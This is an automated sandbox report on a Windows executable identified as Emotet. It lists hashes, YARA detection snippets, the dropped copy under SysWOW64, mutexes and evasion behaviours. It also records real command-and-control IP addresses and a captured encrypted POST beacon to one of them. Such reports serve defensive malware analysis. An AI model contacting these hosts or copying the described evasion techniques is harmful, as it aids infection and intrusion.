Play interactive tour

Edit tour

Analysis Report pitEBNziGR

Overview

General Information

Sample Name:	pitEBNziGR (renamed file extension from none to exe)
Analysis ID:	376866
MD5:	ecbc4b40dcfec4ed1b2647b217da0441
SHA1:	e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:	878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Emotet

Changes security center settings (notifications, updates, antivirus, firewall)

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Startup

System is w10x64

pitEBNziGR.exe (PID: 3864 cmdline: 'C:\Users\user\Desktop\pitEBNziGR.exe' MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

pitEBNziGR.exe (PID: 5676 cmdline: C:\Users\user\Desktop\pitEBNziGR.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

audioservice.exe (PID: 5952 cmdline: C:\Windows\SysWOW64\audioservice.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

audioservice.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\audioservice.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

svchost.exe (PID: 5404 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1720 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 380 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5948 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4308 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5812 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 1180 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 1260 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 5488 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
pitEBNziGR.exe	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
pitEBNziGR.exe	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 40 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 40 00 85 C0

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.202612718.0000000000A81000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000000.201565611.0000000000A81000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.461283657.0000000000A81000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000000.202311649.0000000000A81000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000000.195720063.0000000000A81000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000000.194827594.0000000000A81000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.202853899.0000000000A81000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.0.audioservice.exe.a80000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.0.audioservice.exe.a80000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 A8 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 A8 00 85 C0
3.2.audioservice.exe.a80000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.audioservice.exe.a80000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 A8 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 A8 00 85 C0
1.0.pitEBNziGR.exe.a80000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.0.pitEBNziGR.exe.a80000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 A8 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 A8 00 85 C0
2.2.audioservice.exe.a80000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.audioservice.exe.a80000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 A8 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 A8 00 85 C0
1.2.pitEBNziGR.exe.a80000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.pitEBNziGR.exe.a80000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 A8 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 A8 00 85 C0
3.0.audioservice.exe.a80000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.0.audioservice.exe.a80000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 A8 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 A8 00 85 C0
0.2.pitEBNziGR.exe.a80000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.pitEBNziGR.exe.a80000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 A8 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 A8 00 85 C0
0.0.pitEBNziGR.exe.a80000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.pitEBNziGR.exe.a80000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 A8 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 A8 00 85 C0
Click to see the 11 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: pitEBNziGR.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Show sources

Source: http://173.230.145.224:8080/	Virustotal: Detection: 6%			Perma Link
Source: http://193.169.54.12:8080/	Virustotal: Detection: 6%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: pitEBNziGR.exe	Virustotal: Detection: 83%			Perma Link
Source: pitEBNziGR.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Show sources

Source: pitEBNziGR.exe

Joe Sandbox ML: detected

Source: pitEBNziGR.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: pitEBNziGR.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: global traffic	TCP traffic: 192.168.2.3:49722 -> 193.169.54.12:8080
Source: global traffic	TCP traffic: 192.168.2.3:49732 -> 173.230.145.224:8080

Source: Joe Sandbox View	IP Address: 193.169.54.12 193.169.54.12
Source: Joe Sandbox View	IP Address: 173.230.145.224 173.230.145.224

Source: global traffic

HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 436Connection: Keep-AliveCache-Control: no-cacheData Raw: 97 72 e0 59 98 a6 57 df 28 e7 48 40 d4 d8 66 59 dc e8 1f bb ba 3e 21 1e 38 80 b6 ec ee 2a 1a a3 87 a9 c8 b4 ee ed dc a6 6f 47 9b 1e 06 04 e0 a5 a8 3e 98 71 5b 7c ec 3f d9 e4 3c 6f 39 b8 7e 2a 40 46 cf 1a a4 90 a6 15 44 8e 34 a1 21 30 73 1a e6 7d da 53 34 e9 8b 08 fd d2 65 b7 ef 4e 7b 1b 41 cf 1e 4e 04 67 cc b6 b0 8e b7 39 83 f2 85 7b a1 76 75 0b b7 56 49 19 1d 10 3a 94 65 9b 6e db f7 b7 29 b4 9a 96 57 3d ea 50 0f 80 91 3e 6c 5d 71 bf 0c d3 1d 33 2c 3a 9a 00 cf a7 c7 6e 8d 93 33 f1 a9 fe 49 f2 03 fe be 4b 22 73 87 0a 9f 61 aa f6 e6 a0 a1 63 62 25 cf 29 54 e3 40 05 0a ac 61 fb 48 f7 e2 51 c2 17 4b ed 50 6e 0f 9a 96 21 f2 fd 66 9d 79 03 73 e2 c1 d8 97 fd 28 89 6a 62 09 bd 80 74 21 8d 9c 6f be e5 fe 66 36 c6 f5 62 24 ad 3f ae e1 aa f8 d6 42 cc 1a d8 f1 89 6f d4 95 30 68 64 5c cc 00 d3 be a3 ab ce 3f 52 9f ab 9e f6 9e ca 9b 6b 13 0e ca 26 0e 82 55 62 9c 00 2e 21 f3 b7 c2 9d 7d 9f 04 f3 7e 0f c1 76 1a 7a 4b 82 60 af 42 06 7b 0a 93 6c fe 13 8f b9 4f 78 86 2b 0a ed 48 97 4d 62 66 9c 72 e1 05 9c 40 f9 8e 63 e2 1d 1f ad df 9d ec d9 92 31 7e ae 62 0d 09 5c 09 8c d1 5d d1 bc 4b 7f cb 09 5b 4c 65 2d 57 57 2b e3 5a 97 5b 02 cc 16 fd 31 6b b3 55 c4 2a 4e 8f ca 6b 96 64 58 fe 94 ef e4 92 ec 3c 15 62 55 43 64 8e 63 e9 8e 48 56 b5 de 1f 75 a2 6e 36 87 35 88 1b e3 52 6c ca 2f 39 c7 37 99 59 b5 08 78 45 5b Data Ascii: rYW(H@fY>!8*oG>q[|?<o9~*@FD4!0s}S4eN{ANg9{vuVI:en)W=P>l]q3,:n3IK"sacb%)T@aHQKPn!fys(jbt!of6b$?Bo0hd\?Rk&Ub.!}~vzK`B{lOx+HMbfr@c1~b\]K[Le-WW+Z[1kU*NkdX<bUCdcHVun65Rl/97YxE[

Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 193.169.54.12
Source: unknown	TCP traffic detected without corresponding DNS query: 193.169.54.12
Source: unknown	TCP traffic detected without corresponding DNS query: 193.169.54.12
Source: unknown	TCP traffic detected without corresponding DNS query: 173.230.145.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.230.145.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.230.145.224

Source: unknown

Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	String found in binary or memory: http://173.230.145.224:8080/
Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	String found in binary or memory: http://173.230.145.224:8080/TM
Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	String found in binary or memory: http://173.230.145.224:8080/gM#
Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	String found in binary or memory: http://173.230.145.224:8080/l
Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	String found in binary or memory: http://193.169.54.12:8080/
Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	String found in binary or memory: http://193.169.54.12:8080/5
Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	String found in binary or memory: http://193.169.54.12:8080/_M
Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	String found in binary or memory: http://193.169.54.12:8080/ux
Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	String found in binary or memory: http://79.172.249.82:443/
Source: svchost.exe, 00000006.00000002.462241785.0000028F2D8A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000006.00000002.462241785.0000028F2D8A9000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000006.00000002.464877515.0000028F33015000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000006.00000002.462241785.0000028F2D8A9000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: svchost.exe, 00000006.00000002.464505561.0000028F32EC0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 0000000B.00000002.308355210.000001939C613000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000008.00000002.461881870.0000024118645000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000008.00000002.461881870.0000024118645000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000008.00000002.461881870.0000024118645000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000008.00000002.461803156.000002411862A000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000008.00000002.461803156.000002411862A000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.308383976.000001939C63E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.308394226.000001939C64D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.308383976.000001939C63E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.308149953.000001939C641000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.308149953.000001939C641000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000003.308142924.000001939C657000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.308142924.000001939C657000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.308142924.000001939C657000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000002.308394226.000001939C64D000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308149953.000001939C641000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308146538.000001939C645000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.308383976.000001939C63E000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.286370110.000001939C631000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000002.308383976.000001939C63E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.308355210.000001939C613000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.308383976.000001939C63E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.286370110.000001939C631000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.308146538.000001939C645000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.286370110.000001939C631000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000002.308379172.000001939C63A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000002.308394226.000001939C64D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: pitEBNziGR.exe, type: SAMPLE
Source: Yara match	File source: 00000002.00000002.202612718.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.201565611.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.461283657.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.202311649.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.195720063.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.194827594.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.202853899.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 2.0.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: pitEBNziGR.exe, type: SAMPLE	Matched rule: Emotet Payload Author: kevoreilly
Source: 2.0.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 3.2.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 1.0.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 2.2.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 1.2.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 3.0.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 0.2.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 0.0.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly

Source: C:\Windows\SysWOW64\audioservice.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache

Jump to behavior

Source: C:\Users\user\Desktop\pitEBNziGR.exe

File deleted: C:\Windows\SysWOW64\audioservice.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\pitEBNziGR.exe	Code function: 0_2_00A877F0		0_2_00A877F0
Source: C:\Users\user\Desktop\pitEBNziGR.exe	Code function: 0_2_00A86E70		0_2_00A86E70

Source: pitEBNziGR.exe, 00000001.00000002.203635375.00000000031A0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs pitEBNziGR.exe
Source: pitEBNziGR.exe, 00000001.00000002.203635375.00000000031A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs pitEBNziGR.exe
Source: pitEBNziGR.exe, 00000001.00000002.203491288.0000000002F80000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs pitEBNziGR.exe

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: pitEBNziGR.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: pitEBNziGR.exe, type: SAMPLE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 2.0.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 3.2.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.0.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 2.2.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.2.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 3.0.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0.2.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0.0.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload

Source: classification engine

Classification label: mal100.troj.evad.winEXE@17/8@0/5

Source: C:\Users\user\Desktop\pitEBNziGR.exe

Code function: 0_2_00A82110 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00A82110

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

Jump to behavior

Source: C:\Users\user\Desktop\pitEBNziGR.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\M41F765F2
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1632:120:WilError_01
Source: C:\Users\user\Desktop\pitEBNziGR.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\I41F765F2
Source: C:\Windows\SysWOW64\audioservice.exe	Mutant created: \BaseNamedObjects\Global\I41F765F2
Source: C:\Users\user\Desktop\pitEBNziGR.exe	Mutant created: \Sessions\1\BaseNamedObjects\MCDA8B17A
Source: C:\Windows\SysWOW64\audioservice.exe	Mutant created: \BaseNamedObjects\M8D708131

Source: pitEBNziGR.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pitEBNziGR.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\pitEBNziGR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: pitEBNziGR.exe	Virustotal: Detection: 83%
Source: pitEBNziGR.exe	ReversingLabs: Detection: 96%

Source: unknown	Process created: C:\Users\user\Desktop\pitEBNziGR.exe 'C:\Users\user\Desktop\pitEBNziGR.exe'
